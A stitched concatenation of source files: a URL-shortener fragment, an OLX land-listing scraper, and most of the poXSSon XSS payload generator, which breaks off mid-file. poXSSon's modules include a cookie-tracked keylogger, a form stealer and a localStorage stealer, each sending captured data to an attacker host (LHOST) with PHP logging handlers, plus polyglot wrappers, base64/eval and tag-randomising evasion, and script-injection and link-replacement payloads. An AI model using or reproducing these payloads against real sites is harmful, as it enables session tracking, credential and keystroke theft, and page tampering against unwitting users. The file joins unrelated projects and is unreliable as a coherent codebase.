self.redis = Redis()
if not self.redis.does_key_exist('id'):
self.redis.add_key_value('id', '1')
config = configparser.ConfigParser()
config.read('config.ini')
self.short_url = config['config']['short_url']
self.accepted_char = config['config']['accepted_char']
def shorten_url(self, original_url):
if (self.redis.does_key_exist(original_url)):
url_id = int(self.redis.get_value_by_key(original_url))
shorten_url = self.url_encoder(url_id)
else:
url_id = int(self.redis.get_value_by_key('id'))
self.redis.add_key_value(original_url, url_id)
shorten_url = self.url_encoder(url_id)
url_id += 1
self.redis.add_key_value('id', str(url_id))
return self.short_url+shorten_url
def url_encoder(self, id):
characters = self.accepted_char
base = len(characters)
encoden_url = []
while id > 0:
val = id % base
encoden_url.append(characters[val])
id = (id // base)
return "".join(encoden_url[::-1])
|
FranciscoBurigo/OLX_scrapper | Buscador_de_dados_olx.py | <gh_stars>0
# Codigo buscar dados OLX
#by <NAME>
import pandas as pd
import numpy as np
import requests
from bs4 import BeautifulSoup
import json
from difflib import SequenceMatcher
from selenium import webdriver
import time
from datetime import date
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
import unidecode
ListaURLS = []
listaJson =[]
Dictdt= []
Dictdd= []
##########busca URLS dos anuncios e salva em uma lista#########
def buscaURLsOLX(pages = 10):
ErroLink = 0
for x in range(1, pages):
url = "https://sc.olx.com.br/florianopolis-e-regiao/imoveis/terrenos/compra?o=" + str(x)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'}
page = requests.get(url = url, headers=headers)
soup = BeautifulSoup(page.content,'lxml')
itens = soup.find_all("li", {"class" : "sc-1fcmfeb-2 fvbmlV"})
for a in itens :
try:
URL_anuncio = a.find("a")["href"]
ListaURLS.append(URL_anuncio)
except:
ErroLink = ErroLink + 1
N_Pag = len(ListaURLS)
print("O numero de links coletados foi:"+ str(N_Pag) + ", não conseguindo coletar um total de " + str(ErroLink))
return(ListaURLS)
#########Pega URLs da lista, e entra em cada para salvar dados desejados#########
def buscaDadosOLX(ListaURLS):
N_Pag = len(ListaURLS)
for x in range(0, N_Pag):
url = ListaURLS[x]
try:
chrome_options = Options()
chrome_options.add_argument("--headless")
s = Service('C:/Users/franc/OLX_scrapper/chromedriver.exe')
browser = webdriver.Chrome(service=s, options = chrome_options)
browser.get(url)
time.sleep(5)
html = browser.page_source
soup = BeautifulSoup(html,'lxml')
Titulo = soup.find("h1",{"class" : "sc-45jt43-0 eCghYu sc-ifAKCX cmFKIN"}).get_text()
Preco = soup.find("h2",{"class" : "sc-1wimjbb-2 iUSogS sc-ifAKCX cmFKIN"}).get_text()
Preco = Preco.replace("R$","")
Preco = float(Preco.replace(".",""))
Descricao = soup.find("span",{"class" : "sc-1sj3nln-1 eOSweo sc-ifAKCX cmFKIN"}).get_text()
NomeVendedorURL = soup.find("span",{"class": "sc-fBuWsC sc-jGFFOr iNEwhQ sc-hARARD ksmUnv sc-ifAKCX cmFKIN"}).get_text()
ddclass = soup.find_all("dd",{"class": "sc-1f2ug0x-1 ljYeKO sc-ifAKCX kaNiaQ"})
dtclass = soup.find_all("dt",{"class": "sc-1f2ug0x-0 cLGFbW sc-ifAKCX cmFKIN"})
for a in range(0, len(ddclass)):
Dictdt.append( unidecode.unidecode(dtclass[a+ 1].get_text()))
Dictdd.append( unidecode.unidecode(ddclass[a].get_text()))
dict_tamanho_localizacao = dict(zip(Dictdt, Dictdd))
json = {"Titulo" : Titulo,
"Preco" : Preco,
"NomeVendedor" : NomeVendedorURL,
"Descricao" : Descricao,
"URL_Anuncio": url
}
json.update(dict_tamanho_localizacao)
listaJson.append(json)
#Limpa as listas para que se caso o dado não tenha, não repita o valor anterior
Dictdt.clear()
Dictdd.clear()
except:
print("Erro para pegar dados")
buscaURLsOLX()
buscaDadosOLX(ListaURLS)
df = pd.DataFrame(listaJson)
df.to_csv("Terrenos.csv")
|
redcode-labs/poXSSon | poxsson.py | #!/usr/bin/python3
import argparse
from huepy import *
import sys
import importlib
import os
import base64
import pyperclip
import subprocess
from terminaltables import SingleTable
import random
import socket
#import atexit
POXSSON_PATH = os.path.realpath(__file__).replace("poxsson.py", "") #Absolute path of the project directory
polyglot_triggers = [
["onload","common tags", "0-click"],
["onpageshow","body","Works only without DOM dependency"],
["onfocus","input, select, a", "Use 'autofocus'for 0click"],
["onerror","img, input, object, link, script, video, audio","Specify wrong params to trigger error handling"],
["onanimationstart","CSS element","Fired then a CSS animation starts"],
["onanimationend","CSS element", "Fires when a CSS animation ends"],
["onstart","marquee","Fires on marquee animation start - Firefox only"],
["onfinish","marquee","Fires on marquee animation end - Firefox only"],
["ontoggle","details","Add ‘open’ attribute for 0-click"]
]
polyglots = {
"1" : """javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/TRIGGER=PAYLOAD//>""",
"2" : "\"'--></noscript></noembed></template></title></textarea></style><script><svg TRIGGER=PAYLOAD></script>",
"3" : "'\"--></title></textarea></style></noscript></noembed></template></frameset><svg TRIGGER=PAYLOAD>",
"4" : "\"'>-->*/</noscript></title><script><svg TRIGGER=PAYLOAD></script>" ,
"5" : "\"'--></style></script><svg TRIGGER=PAYLOAD>",
"6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html TRIGGER="/**/ PAYLOAD//'">`"""
}
#Obtains local IP for use with handler
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def print_banner():
print("")
print("")
print(green("{_______ {__ {__ {__ __ {__ __"))
print(green("{__ {__ {__ {__ {__ {__{__ {__ "))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ "))
print(green("{_______ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__{__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ __ {__ __ {__ {___ {__ "))
print("")
#Function for printing metasploit-like tables ;>
def print_table(table_data):
styles = []
for title in table_data[0]:
msf_style = "-"*len(title)
styles.append(msf_style)
table_data.insert(1, styles)
table_instance = SingleTable(table_data)
table_instance.inner_heading_row_border = False
table_instance.inner_row_border = False
table_instance.inner_column_border = False
table_instance.outer_border = False
table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
print(table_instance.table)
print('')
#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
#print(f"\n{logs.red(logs.bold("|"))} PAYLOADS {logs.red(logs.bold("|"))}")
table_data = [["Name", "Description", "Handler", "Length"]]
payloads = []
plds = []
for p in os.walk(POXSSON_PATH+'payloads'):
payloads.append(p)
payloads = payloads[0][2]
for p in payloads:
if ('init' in p or '.pyc' in p):
pass #We don't want temporary files to interfere
else:
if ('.py' in p and not '.pyc' in p):
plds.append(importlib.import_module("payloads."+p.replace(".py", ''))) #Each payload is imported and treated as a module
for pl in plds:
try:
handler = pl.handler
handler = True
except:
handler = False
table_data.append([red(pl.name), blue(pl.description), handler, len(pl.payload)])
print(info(f"Available payloads: {len(plds)}"))
print("")
print_table(table_data)
print("")
polyglot_triggers_data = polyglot_triggers.insert(0, ["Name", "Compatibility", "Description"])
print(info(f"Available triggers: {len(polyglot_triggers)}"))
print("")
print_table(polyglot_triggers)
print("")
print(good(f"Available polyglots: {len(polyglots)}"))
for idn in polyglots:
print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}")
print("")
#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
try:
handler = payload_mod.handler
handler = True
except:
handler = False
try:
for opt in payload_mod.options: #Extracts several information from multi-dimensional .options list
option = opt[0]
value = opt[1]
description = opt[2]
payload_options_table_data.append([option, value, description])
except:
pass
try:
for opt in payload_mod.handler_options:
option = opt[0]
value = opt[1]
description = opt[2]
handler_options_table_data.append([option, value, description])
except:
pass
#Prints all obtained data with f"" prefix formatting
print(info(f"Name: {payload_mod.name}"))
print(info(f"Description: {payload_mod.description}"))
print(info(f"Length: {len(payload_mod.payload)} bytes"))
print(info(f"Handler: {handler}"))
if len(payload_options_table_data) > 1:
print("")
info("Payload options:")
print("")
print_table(payload_options_table_data)
if len(handler_options_table_data) > 1:
print("")
info("Handler options:")
print("")
print_table(handler_options_table_data)
#def test_payload(payload_name):
# pass
#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)
#And launches it from there using PHP inline interpreter
def start_php_handler(php_code):
#subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True)
with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file:
handler_file.write(php_code)
handler_file.close()
subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True)
subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True)
#Inserts default options, and also options passed as NAME=VAL in command line
def insert_options(payload_code, payload_options, cli_options):
pc = payload_code
for option in cli_options:
name = option.split("=")[0].upper()
value = option.split("=")[1]
pc = pc.replace(name.upper(), value)
for option in payload_options:
name = option[0]
value = option[2]
if (value == "" and "=" in ''.join(cli_options)):
print(info(f"{name.upper()} option is empty")) #Warns if you forgot to set something
#if name.upper() not in payload_code:
#logs.err("No such option")
#sys.exit()
if name.lower() not in ''.join(cli_options):
pc = pc.replace(name.upper(), value)
#try:
#except:
return pc
def arguments():
parser = argparse.ArgumentParser(prog="poxsson")
wrapping = parser.add_argument_group()
#wrapping_group = wrapping.add_mutually_exclusive_group()
parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed
parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads')
parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='<payload>', help='Specify the payload')
parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity')
parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info')
parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion')
parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard')
parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='<file>', help='Save payload to a file')
parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='<n[s|m|h]>', help='Execute payload after specific period of time (seconds, minutes, hours)')
parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='<encoding>', help='Encode payload')
parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='<sep>', help="Use specific (or random) separator between tag and first parameter")
#Separate group for executable wrappers (it just looks more clear imho)
wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload")
wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic <script> tags")
wrapping.add_argument('--tag-random', action='store_true', dest='TAG_RANDOM', help="Wrap payload with random <script> tags")
wrapping.add_argument('--tag-different', action='store_true', dest='TAG_RANDOM_DIFFERENT', help="When combined with above option, generates different start and end tags")
wrapping.add_argument('--tag-closer', action='store_true', dest='TAG_CLOSER', help="Use '//' instead of '>' for closing tags")
wrapping.add_argument('--polyglot', action='store', dest='POLYGLOT', metavar="<id>", help="Wrap payload with selected or random polyglot wrapper")
wrapping.add_argument('--polyglot-trigger', action='store', dest='POLYGLOT_TRIGGER', help="Wrap payload with polyglot wrapper")
wrapping.add_argument('--cookie', action='store_true', dest='COOKIE', help="Use cookie shortener to reduce payload's size and detection probability")
wrapping.add_argument('--confirm', action='store_true', dest='CONFIRM', help="Replace alert() popups with less detectable confirm()")
wrapping.add_argument('--oneliner', action='store_true', dest='ONELINER', help="Convert generated payload to one-liner")
wrapping.add_argument('--bookmarklet', action='store_true', dest='BOOKMARKLET', help="Convert generated payload to a bookmarklet")
wrapping.add_argument('--handler', action='store_true', dest='HANDLER', help="Start handler after payload generation")
wrapping.add_argument('--replace-http', action='store_true', dest='REPLACE_HTTP', help="Replace 'http[s]://' with a random substitute")
wrapping.add_argument('--jquery', action='store_true', dest='JQUERY', help="Load JQuery before running the payload")
wrapping.add_argument('--v2', action='store_true', dest='VUE_2', help="Embedd payload inside VueJS v2 template source")
wrapping.add_argument('--v3', action='store_true', dest='VUE_3', help="Embedd payload inside VueJS v2 template source")
wrapping.add_argument('--angular', action='store_true', dest='ANGULAR', help="Embedd payload inside AngularJS template source")
#parser.add_argument('--replacei-chars', action='store', choices=['html', 'octal', 'url', 'iso', 'hex', 'numeric'], dest='REPLACE',
# help="Replace all special characters with their equivalents of selected type")
return parser.parse_args()
def main():
res = arguments()
if res.LIST_PAYLOADS:
list_payloads()
sys.exit()
try:
loaded_payload = importlib.import_module(f"payloads.{res.PAYLOAD}") #We try to load our specified payload here
except ImportError:
print(bad("No such payload"))
sys.exit()
js_code = loaded_payload.payload
if res.RANDOM_MAX:
if res.PAYLOAD == "random":
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
if res.PAYLOAD == "confirm":
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
js_code = insert_options(js_code, loaded_payload.options, res.OPTIONS) #Options replacement
if res.DELAY:
time_shorts = {'s':1000, 'm':60000, 'h':3600000}
if type(res.DELAY) == int:
delay_in_miliseconds = int(res.DELAY)
else:
if res.DELAY[-1] not in ['s', 'm', 'h']:
print(err("Wrong delay format"))
sys.exit()
delay_in_miliseconds = int(res.DELAY[0:-1])*time_shorts[res.DELAY[-1]]
js_code = f"""setTimeout(function() {
{js_code}
}, {delay_in_miliseconds})""" #Our payload is embeded inside "setTimeout". The timeout itself is expanded from interval to miliseconds
if res.JQUERY:
js_code = f"""<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">{js_code}"""
if res.INFO:
print_payload_info(loaded_payload)
sys.exit() #Shows details and exits
if res.ONELINER:
js_code = js_code.replace("\n", "") #Replaces newlines so the payload becomes a one-liner
if res.BOOKMARKLET:
js_code = "javascript:(function(){" + js_code.replace("\n", "") + "})();"
if res.NULL_INSERT:
null_char = "%%00"
payload_len = len(js_code)
start_position = random.randrange(payload_len)
#Not finished yet, but it should insert NULLs on random positions.
if res.REPLACE_HTTP:
substitute = random.choice(["//", "/\\\\", "\\\\"])
js_code = js_code.replace("http://", "//") #Sometimes http[s] can be omitted in payloads
js_code = js_code.replace("https://", "//")
if res.ENCODE:
if res.ENCODE == "base64":
js_code = f"""eval(decode64('{base64.b64encode(js_code.encode("utf-8"))}'))"""
elif res.ENCODE == "utf8":
js_code = js_code.encode("utf-8") #Payload encoders
else:
logs.err("No such encoding")
sys.exit()
if res.POLYGLOT: #Polyglot wrapper makes it easy to exec payload in multiple environments
if res.POLYGLOT == "random":
plg = polyglots[res.POLYGLOT]
else:
plg = random.choice(list(polyglots.values()))
polyglot = plg.replace("PAYLOAD", js_code).replace("TRIGGER", res.POLYGLOT_TRIGGER)
js_code = polyglot
if res.TAG:
js_code_non_tagged = js_code
js_code = f"<script>{js_code}</script>"
if res.COOKIE:
js_code = js_code.replace("document.cookie", "cookie")
js_code_non_tagged = js_code
if res.SEPARATOR:
separators = {
"slash" : "/",
"newline" : "\n",
"tab" : "\t",
"carriage" : '0x3c'
}
def select_separator():
if res.SEPARATOR == "random":
return random.choice(list(separators.values()))
else:
return separators[res.SEPARATOR]
src = bs.find_all(js_code, "html.parser")
for tag in src.find_all():
js_code = js_code.replace(tag.name, tag.name+select_separator())
js_code_non_tagged = js_code
if res.TAG_RANDOM: #Just a tag obfuscation (ex. <script> => <ScRiPt>)
if res.TAG:
js_code = js_code_non_tagged
script_tag = "script"
script_tag = "".join(random.choice([c.upper(), c]) for c in script_tag )
end_tag = script_tag
if res.TAG_RANDOM_DIFFERENT:
end_tag = "".join(random.choice([c.upper(), c]) for c in script_tag )
js_code = f"<{script_tag}>{js_code}</{end_tag}>"
if res.TAG_CLOSER:
js_code = js_code.replace(">", "//")
if res.CONFIRM:
js_code = js_code.replace("alert", "confirm")
if res.VUE_2:
js_code = f"{{constructor.constructor('{js_code}')()}}"
if res.VUE_3:
js_code = f"{{_openBlock.constructor('{js_code}')()}}"
if res.ANGULAR:
js_code = f"{{constructor.constructor('{js_code}')()}}"
if res.CLIP: #Copies payload to system clipboard (can be pasted with Ctrl-V)
pyperclip.copy(js_code)
if res.OUTPUT: #Saves payload to a file
with open(res.OUTPUT, "w+") as payload_file:
payload_file.write(js_code)
if res.VERBOSE:
print(info(f"Saved payload as {res.OUTPUT}"))
print(info(f"Payload length: {len(js_code)}"))
print(good("Generated payload:"))
print("")
print(blue(js_code)) #Prints payload to STDIN in a fancy blue color :>
if res.HANDLER:
try:
#Starts handler and inserts required options (defined inside payload's bodies)
handler_code = loaded_payload.handler
handler_code = insert_options(handler_code, loaded_payload.handler_options, res.OPTIONS)
print(info("Started handler"))
start_php_handler(handler_code)
except AttributeError:
print(err("This module does not have a handler"))
#sys.exit()
#Btw, if you know JS, you can easily write you own, custom payloads.
#Each payload is a separate Python module. Here are possible variables:
# .payload - the actual code of the payload. Upper-case words (ex. CMD, LHOST) are later replaced as options names
# .[handler_]options - two-dimensional, single element list. Option entry looks like this: [<name>, <description>, <default_value>]
# .handler - custom, payload-specific PHP handler.
if __name__ == "__main__":
print_banner()
try:
main()
except KeyboardInterrupt:
print("")
print(info("Exiting"))
|
redcode-labs/poXSSon | lib/handler.py | <gh_stars>10-100
#!/usr/bin/python3.7
from http.server import HTTPServer, BaseHTTPRequestHandler
class DefaultHandler(BaseHTTPRequestHandler):
def do_GET(self):
print(self.path)
#self.send_response(200)
#self.end_headers()
#self.wfile.write(b'Hello, world!')
def start_handler(port, log, outfile):
httpd = HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler)
httpd.serve_forever()
|
redcode-labs/poXSSon | payloads/alert.py | #!/usr/bin/python3.7
name="alert"
description="Print alert message"
options=[["MESSAGE", "Alert message to print", "alert!"]]
payload = """
alert('MESSAGE')
"""
|
redcode-labs/poXSSon | payloads/info.py | #!/usr/bin/python3.7
import socket
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="info"
description="Retrieve information about the application that launched the script"
options = [["LHOST", "Host to send captured strokes to", local_ip()]]
handler_options = [["LOGFILE", "File to store logged data", "storage_dump.txt"]]
navigator_attributes = [
"navigator.appCodeName",
"navigator.appName",
"navigator.appVersion",
"navigator.buildID",
"navigator.cookieEnabled",
"navigator.language",
"navigator.mimeTypes",
"navigator.onLine",
"navigator.oscpu",
"navigator.platform",
"navigator.plugins",
"navigator.product",
"navigator.productSub",
"navigator.securityPolicy",
"navigator.userAgent",
"navigator.vendor",
"navigator.vendorSub",
]
payload = """
"""
|
redcode-labs/poXSSon | payloads/shortest.py | #!/usr/bin/python3
name="shortest"
description="The shortest payload for XSS injection"
payload = "<script src=//14.rs>" |
redcode-labs/poXSSon | payloads/img_replace.py | <reponame>redcode-labs/poXSSon<filename>payloads/img_replace.py
#!/usr/bin/python3.7
name="img_replace"
description="Replace all images on site with an image pointed to by URL"
options = [["URL", "URL of the new image", ""]]
payload = """
var imgs = document.getElementsByTagName("img");
for(var i=0, l=imgs.length; i<l; i++) {
imgs[i].src = "URL";
}
"""
|
redcode-labs/poXSSon | payloads/hide.py | <filename>payloads/hide.py
#!/usr/bin/python3.7
name="hide"
description="Hides specified element on the page"
options = [['ELEMENT_ID', "ID of the element to hide", ""]]
payload = """
var p = document.getElementById('ELEMENT_ID');
p.style.display = 'none';
"""
|
redcode-labs/poXSSon | payloads/random_confirm.py | #!/usr/bin/python3
import random
name="random_confirm"
description="Chooses a random one-liner 'confirm()' payload. An alternative to standard 'alert()'"
options = [[]]
payload = random.choice(open('random_confirm_payloads.txt').readlines())
|
redcode-labs/poXSSon | payloads/add_script.py | <reponame>redcode-labs/poXSSon
#!/usr/bin/python3.7
name="add_script"
description="Append external script to the top of the 'head' tag of the site as child element"
options = [['URL', "URL of the external script", ""]]
payload = """
var script=document.createElement('script');
script.type='text/javascript';
script.src='URL';
document.getElementsByTagName('head')[0].appendChild(script);
"""
|
redcode-labs/poXSSon | payloads/session_keylogger.py | <filename>payloads/session_keylogger.py
#!/usr/bin/python3.7
import socket
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="session_keylogger"
description="A keylogger which follows user sessions thanks to an ID set into a cookie"
options = [["LHOST", "Host to send captured strokes to", local_ip()],
["INTERVAL", "Number of seconds after which captured keystrokes are sent", "10"],
["TRACK_KEYS", "Track keystrokes", "true"],
["TRACK_MOUSE", "Track mouse movement", "false"],
["TRACK_CLICKS", "Track mouse clicks", "false"],
["COOKIE_NAME", "Name of the cookie shown in the browser", "cook"],
["COOKIE_LIFETIME", "Lifetime of cookie in days", "1"]]
handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]]
payload = """
function Keylogger(){
//Bufers
/*
* Configuration of the keylogger
******
* track_keys : True if one wants to track the key pressed
* track_mouse : True if one wants to track the movements of mouse
* track_clicks : true if one wants to track the click
* send_interval_s : interval to send the request to the server (in second)
* distant_server : address of the server
* cookie_name : Name of the cookie in the browser
* cookie_lifetime : Lifetime of the cookie in days
*/
this.keylog_configuration={
track_keys: TRACK_KEYS,
track_mouse: TRACK_MOUSE,
track_clicks: TRACK_CLICKS,
send_interval_s: INTERVAL,
distant_server:'http://LHOST:8000/handler.php',
cookie_name:'COOKIE_NAME',
cookie_lifetime: COOKIE_LIFETIME
};
/*
* Function that generates a GUID (but not a strong one)
*/
this.S4=function() {
return (((1+Math.random())*0x10000)|0).toString(16).substring(1);
};
/*
* Constructor-like function
* Initialize elements to the right values
*/
this.begin=function(){
var guid_in_cookies;
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==this.keylog_configuration.cookie_name)
{
guid_in_cookies= unescape(y);
}
}
if(guid_in_cookies!=null && guid_in_cookies.length >0){
this.guid=guid_in_cookies;
}
else{
/* Create the GUID */
this.guid= (this.S4()+this.S4()+"-"+this.S4()+"-"+
this.S4()+"-"+this.S4()+"-"+this.S4()+
this.S4()+this.S4());
/* Cookie setup*/
var exdate = new Date();
var exdays = this.keylog_configuration.cookie_lifetime;
exdate.setDate(exdate.getDate() +exdays );
var c_value=escape(this.guid) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=this.keylog_configuration.cookie_name + "=" + c_value;
}
this.from_page=encodeURIComponent(window.location.href);
this.transfer_buffer();
//alert("Method had been called" + this.property1);
};
/*
* Insert a key
*/
this.insert_key=function(event){
var new_char='';
if(event.altKey){
new_char = '{{Alt}}';
}else if(event.ctrlKey){
new_char = '{{Ctrl}}';
}else if(event.shiftKey){
new_char = '{{Shift}}';
}
if(event.keyCode!=null){
if(event.keyCode){
new_char=new_char+this.decodeChar(event.keyCode);
}else{
new_char=new_char+this.decodeChar(event.charCode);
}
}
this.buffer_text_current=this.buffer_text_current+new_char;
};
/*
* Decode special characters.
*/
this.decodeChar=function(code){
var charac;
switch(code){
case 8:
charac='{{Backspace}}';
break;
case 9:
charac='{{Tab}}';
break;
case 13:
charac='{{Enter}}';
break;
case 33:
break;
case 37:
charac='{{<-}}';
break;
case 38:
charac='{{up}}';
break;
case 39:
charac='{{->}}';
break;
case 40:
charac='{{down}}';
break;
case 46:
charac='{{delete}}';
break;
case 91:
charac='{{leftWindow}}';
break;
case 92:
charac='{{rightWindow}}';
break;
case 154:
charac='{{PrtScreen}}';
break;
default:
charac=String.fromCharCode(code);
break;
}
return charac;
};
/*
*
*/
this.insert_click=function(event){
// Nothing at the moment
};
/*
*
*/
this.send_infos=function(){
var parameters='?frompage='+this.from_page;
parameters =parameters + '&guid='+this.guid;
parameters = parameters + '&text='+encodeURIComponent(this.buffer_text_to_send);
var address_to_call=this.keylog_configuration.distant_server+parameters;
//We just preload the image without actually inserting it
image01= new Image();
image01.src=address_to_call;
};
/*
* Swap values
*/
this.transfer_buffer=function(){
this.buffer_text_to_send=this.buffer_text_current;
this.buffer_text_current='';
this.send_infos();
var t = setTimeout('logger.transfer_buffer()',this.keylog_configuration.send_interval_s*1000);
};
this.buffer_text_current='[Begin session]',
this.buffer_text_to_send='',
//Important information
this.guid='UNDEFINED',
this.from_page='UNDEFINED';
}
var logger = new Keylogger();
/*
* Launch the logger
*/
function launch(){
logger.begin();
//binding for key pressed
if(logger.keylog_configuration.track_keys){
if (navigator.appName == 'Microsoft Internet Explorer')
{
document.body.attachEvent('onkeypress',process_key);
}else{
//Binding for everything but ie
document.addEventListener('keypress',process_key,false);
//document.body.setAttribute('onKeyPress','Keylogger.insert_key(event)');
}
}
//Binding for click
if(logger.keylog_configuration.track_clicks){
//Binding for everything but ie
//document.body.setAttribute('onclick','Keylogger.insert_click(event)');
}
}
function process_key(event){
logger.insert_key(event);
}"""
handler = """
<?php
/*
* Create a 1 by 1 image with transparent background( if the browser is suspicious of call to non image)
*/
function create_fake_image(){
header('content-type:image/png');
// One by one pixel
$im = imagecreatetruecolor(1, 1);
$background_black = imagecolorallocate($im, 0, 0, 0);
imagecolortransparent($im,$background_black);
imagePNG($im);
}
?>
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
$text=$_GET['text'];
$guid=$_GET['guid'];
$source_page=$_GET['frompage'];
$log_string = "\n[*]Source ip: %s (GUID: %s)\n[*]Source page: %s\n[*] Captured data: %s\n\n"
$f=fopen("LOGFILE","a+");
fwrite($f, sprintf($log_string, $ip, $guid, $source_page, $text));
fclose($f);
create_fake_image();
?>"""
|
redcode-labs/poXSSon | payloads/form_stealer.py | <filename>payloads/form_stealer.py
#!/usr/bin/python3.7
import socket
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="form_stealer"
description="Steals all the values set in forms and sends them away through an image src"
options = [["LHOST", "Host to send captured strokes to", local_ip()]]
handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]]
payload = """
document.getElementsByTagName("body")[0].setAttribute("onunload","postData()");
function postData() {
var output = "page="+document.location;
var inputs, index;
inputs = document.getElementsByTagName('input');
for (index = 0; index < inputs.length; ++index) {
input_name = inputs[index].id || inputs[index].name;
output = output + "&" + input_name + "=" + inputs[index].value;
}
output = encodeURI(output);
new Image().src = "http://LHOST:8000/handler.php?"+output;
}"""
handler = """
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
$header_line = sprintf("\n[*] %s (host: %s)", $_GET["page"], $ip);
$f=fopen("LOGFILE","a+");
fwrite($f, $header_line);
fclose($f);
foreach($_GET as $key => $value){
if ($key == "page"){} else {
$form_line = sprintf("\nName: %s Value: %s", $key, $value);
}
$f=fopen("LOGFILE","a+");
fwrite($f, $form_line);
fclose($f);
}
?>
"""
|
redcode-labs/poXSSon | payloads/random.py | #!/usr/bin/python3
import random
name="random"
description="Chooses a random one-liner payload for blind testing backend's input validation"
options = [[]]
payload = random.choice(open('random_payloads.txt').readlines())
|
redcode-labs/poXSSon | payloads/link_replace.py | <filename>payloads/link_replace.py
#!/usr/bin/python3.7
name="link_replace"
description="Replaces all links on page"
options = [['URL', "URL to replace the links with", "http://example.com"]]
payload = """
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "URL";
});
"""
|
redcode-labs/poXSSon | payloads/storage.py | <gh_stars>10-100
#!/usr/bin/python3.7
import socket
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="storage"
description="Retrieves HTML5 local storage and send it away through an image source URL"
options = [["LHOST", "Host to send captured strokes to", local_ip()]]
handler_options = [["LOGFILE", "File to store logged data", "storage_dump.txt"]]
payload = """
if ('localStorage' in window && window['localStorage'] !== null) {
new Image().src = 'http://LHOST:8000/handler.php?localStorage='+JSON.stringify(window['localStorage']);
}
"""
handler = """
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
